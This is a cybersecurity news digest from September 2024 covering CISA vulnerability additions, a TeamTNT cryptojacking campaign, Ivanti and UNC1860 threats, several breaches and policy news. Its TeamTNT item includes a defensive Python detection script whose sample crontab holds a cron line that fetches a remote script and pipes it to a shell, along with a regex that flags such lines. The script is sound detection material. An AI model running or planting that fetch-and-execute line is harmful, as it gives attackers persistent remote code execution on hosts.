What are the latest cybersecurity alerts, incidents, and news?
CISA, Known Exploited Vulnerability, TeamTNT, Cryptojacking, CentOS, Servers, Rootkit, Ivanti, Cloud Appliance, Iran, UNC1860, Backdoors, Middle East, Networks, Splinter Tool, Red Team, Post-Exploitation, Compass Group, Ransomware, Altman Specialty Plants, Breach, BingX, Hot Wallet, Hack, Schools, Lancashire, UK, Disruption, Star Health, Sensitive Data, Leak, Telegram, FTC, Surveillance, Children, Social Media, Germany, Crypto Exchanges, Underground Economy, DDoS, Ransomware, Dominant, Cyber Threat, Europe, Phishing, Europol, HSBC, Quantum-Safe
Cyber Alerts
The Cybersecurity and Infrastructure Security Agency (CISA) has added five new critical vulnerabilities to its Known Exploited Vulnerabilities Catalog, urging immediate action from organizations. The vulnerabilities, CVE-2024-27348 (Apache HugeGraph-Server), CVE-2020-0618 (Microsoft SQL Server Reporting Services), CVE-2019-1069 (Microsoft Windows Task Scheduler), CVE-2022-21445 (Oracle JDeveloper), and CVE-2020-14644 (Oracle WebLogic Server), are being actively exploited by cybercriminals.
The notorious hacking group TeamTNT has launched a new cryptojacking campaign targeting CentOS-based Virtual Private Servers (VPS). Researchers from Group-IB revealed that the attackers gain access through brute-force attacks on Secure Shell (SSH) services, uploading malicious scripts that disable security measures, erase logs, and terminate competing cryptocurrency mining processes. The campaign also deploys the Diamorphine rootkit to hide malicious activities and establishes persistent remote access via cron jobs and backdoor accounts.
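The two TeamTNT behaviours described above that leave the clearest host-side trail are the SSH brute-force that precedes a successful login and the cron-based persistence. The following detection script is an added example written for this digest, not code from Group-IB or the original article; the auth.log and crontab lines it scans are constructed samples using TEST-NET addresses.

```python
import re
from collections import defaultdict

# Constructed sample auth.log (not from the article): a brute-force burst from one
# source IP that ends in an accepted password, plus an unrelated key-based login.
SAMPLE_AUTH_LOG = """\
Sep 20 10:01:01 vps sshd[2101]: Failed password for root from 203.0.113.7 port 51001 ssh2
Sep 20 10:01:02 vps sshd[2102]: Failed password for root from 203.0.113.7 port 51002 ssh2
Sep 20 10:01:03 vps sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51003 ssh2
Sep 20 10:01:04 vps sshd[2104]: Failed password for root from 203.0.113.7 port 51004 ssh2
Sep 20 10:01:05 vps sshd[2105]: Failed password for root from 203.0.113.7 port 51005 ssh2
Sep 20 10:01:09 vps sshd[2106]: Accepted password for root from 203.0.113.7 port 51006 ssh2
Sep 20 10:05:00 vps sshd[2200]: Accepted publickey for deploy from 198.51.100.4 port 40001 ssh2
"""

# Constructed sample crontab (not from the article): one legitimate job and two
# entries of the kind used for persistence (remote script piped to a shell, @reboot).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
@reboot /root/.x/run.sh
"""

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port")
# Cron lines that fetch-and-execute remote content, or run at every boot.
CRON_SUSPECT = re.compile(r"(?:curl|wget)\b.*\|\s*(?:ba)?sh\b|^@reboot\b")


def brute_force_successes(log_text, threshold=5):
    """Return (ip, user, failures) for every accepted SSH login that was preceded
    by at least `threshold` failed password attempts from the same source IP."""
    failures = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED.search(line)
        if m and failures[m.group(2)] >= threshold:
            hits.append((m.group(2), m.group(1), failures[m.group(2)]))
    return hits


def suspicious_cron_entries(crontab_text):
    """Return non-comment crontab lines matching the persistence patterns above."""
    return [l for l in crontab_text.splitlines()
            if not l.lstrip().startswith("#") and CRON_SUSPECT.search(l)]
```

On a live host, feed `brute_force_successes` the contents of /var/log/auth.log (or journalctl output for sshd) and `suspicious_cron_entries` the output of `crontab -l` for each user plus the files under /etc/cron.d.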
Ivanti has issued an urgent warning regarding a critical vulnerability in its Cloud Service Appliance (CSA), identified as CVE-2024-8963, which is actively being exploited in the wild. With a CVSS score of 9.4, this path traversal flaw allows remote unauthenticated attackers to access restricted functionalities. It can also be chained with another vulnerability, CVE-2024-8190, enabling attackers to bypass admin authentication and execute arbitrary commands.
Iran's state-sponsored cyber group, UNC1860, has emerged as a significant threat in the Middle East, leveraging specialized tools and passive backdoors to infiltrate critical networks, particularly in government and telecommunications sectors. Tied to Iran's Ministry of Intelligence and Security, UNC1860 operates as an initial access provider, facilitating cyber espionage and attacks by enabling third-party actors to gain remote access to compromised systems. Its sophisticated malware, including the TEMPLEPLAY and VIROGREEN controllers, showcases advanced capabilities for stealth and persistence, allowing the group to evade detection and maintain long-term footholds.
Unit 42 cybersecurity researchers, using Advanced WildFire's memory scanning capabilities, have uncovered a new post-exploitation red team tool named Splinter, developed in Rust. This tool is designed to simulate long-term access to target systems, expanding initial access through various methods. Splinter operates on a task-based model, communicating with a command and control (C2) server to execute commands, manage files, and gather data from cloud services.
Cyber Incidents
The Compass Group in North Sydney, Australia, has confirmed a second cyberattack this month by an affiliate of the Medusa ransomware gang. Following an initial breach that resulted in the theft of 785.5 gigabytes of sensitive data, the group has again targeted the company, with reports suggesting that over one terabyte of data may be compromised in this latest incident. This new attack, announced on September 18, includes employee records such as passports and medical certificates. The ransom for the latest breach is set at $100,000, significantly lower than the $2 million demanded after the first attack.
On September 18, 2024, Altman Specialty Plants notified the Texas Attorney General of a significant data breach that compromised sensitive consumer information, including names, Social Security numbers, financial account details, and medical information. The breach was detected on September 11, 2023, when suspicious activity within the company's network prompted an investigation, revealing unauthorized access to confidential files. Following the completion of the investigation in July 2024, Altman began sending notification letters to affected individuals, detailing the compromised information.
BingX, the Singapore-based crypto exchange, has confirmed a “minor asset loss” following suspicious activity detected in one of its hot wallets. Chief product officer Vivien Lin reported that the technical team identified abnormal network access early on September 20, prompting immediate emergency measures, including asset transfers and the suspension of withdrawals. Initial estimates of the outflow were reported as high as $26.7 million by blockchain security firms, although Lin stated the losses are small and manageable.
Schools across Lancashire, UK, have been significantly disrupted by a ransomware cyberattack that has infected the IT infrastructure of the Fylde Coast Academy Trust, affecting all ten of its academies, including several high and primary schools. CEO Dean Logan confirmed that the attack has rendered most computer systems inaccessible, prompting a shift to non-IT-based processes for the time being. While the full extent of the damage is still being assessed, the trust has received swift support from the Department of Education and cybersecurity teams.
Sensitive medical records and personal information from millions of customers of India's largest health insurer, Star Health, have been found exposed through chatbots on the messaging platform Telegram. Security researcher Jason Parker alerted Reuters to the alarming discovery, revealing that these chatbots offer access to policy and claims documents, including names, phone numbers, addresses, tax details, and even medical diagnoses and test results.
Cyber News
A recent Federal Trade Commission (FTC) report has uncovered widespread surveillance practices by major social media and video streaming companies, specifically targeting children and teens. Following an investigation that began in December 2020, the FTC found that these platforms, including Amazon, Meta, YouTube, and TikTok, engage in extensive data collection and retention, often without adequate privacy protections. The report highlights significant concerns over how these companies monetize personal data, raising risks of identity theft and other harms.
German authorities have shut down 47 cryptocurrency exchanges accused of facilitating an “underground economy” for cybercriminals. The Federal Criminal Police Office, along with Frankfurt’s main prosecutor and cybercrime units, stated that these exchanges were involved in concealing the origins of criminally obtained funds and failing to meet anti-money laundering regulations. The government has warned users that their data has been seized, including transactions, registration details, and IP addresses.
A recent report from the European Union Agency for Cybersecurity (ENISA) reveals that Distributed Denial of Service (DDoS) attacks have surpassed ransomware as the most prevalent cyber threat in Europe. From July 2023 to June 2024, nearly half of all cyberattacks in the EU were DDoS incidents, accounting for 41.1% of the total, while ransomware represented 25.8%. The report highlights the significant increase in cyber activity, with NoName057, a pro-Russian hacktivist group, emerging as the most active threat actor.
In a groundbreaking initiative, Europol and Ameripol have successfully dismantled a phishing-as-a-service network that affected over 480,000 victims worldwide. Known as “Operation Kaerb,” this coordinated effort targeted a criminal group primarily operating in Spain and Latin America, responsible for unlocking stolen mobile phones through phishing attacks. During a series of raids across several countries from September 10 to 17, law enforcement arrested 17 individuals and seized numerous items, including mobile phones and weapons.
HSBC has successfully trialled quantum-safe technology to enhance the security of tokenized physical gold transactions. This pilot marks a significant advancement for HSBC, which was the first global bank to offer tokenized gold to institutional investors and later to retail investors in Hong Kong. Utilizing post-quantum cryptography (PQC) and technology from partner Quantinuum, the pilot aims to protect digital assets from potential quantum computing attacks.
Copyright © 2024 CyberMaterial. All Rights Reserved.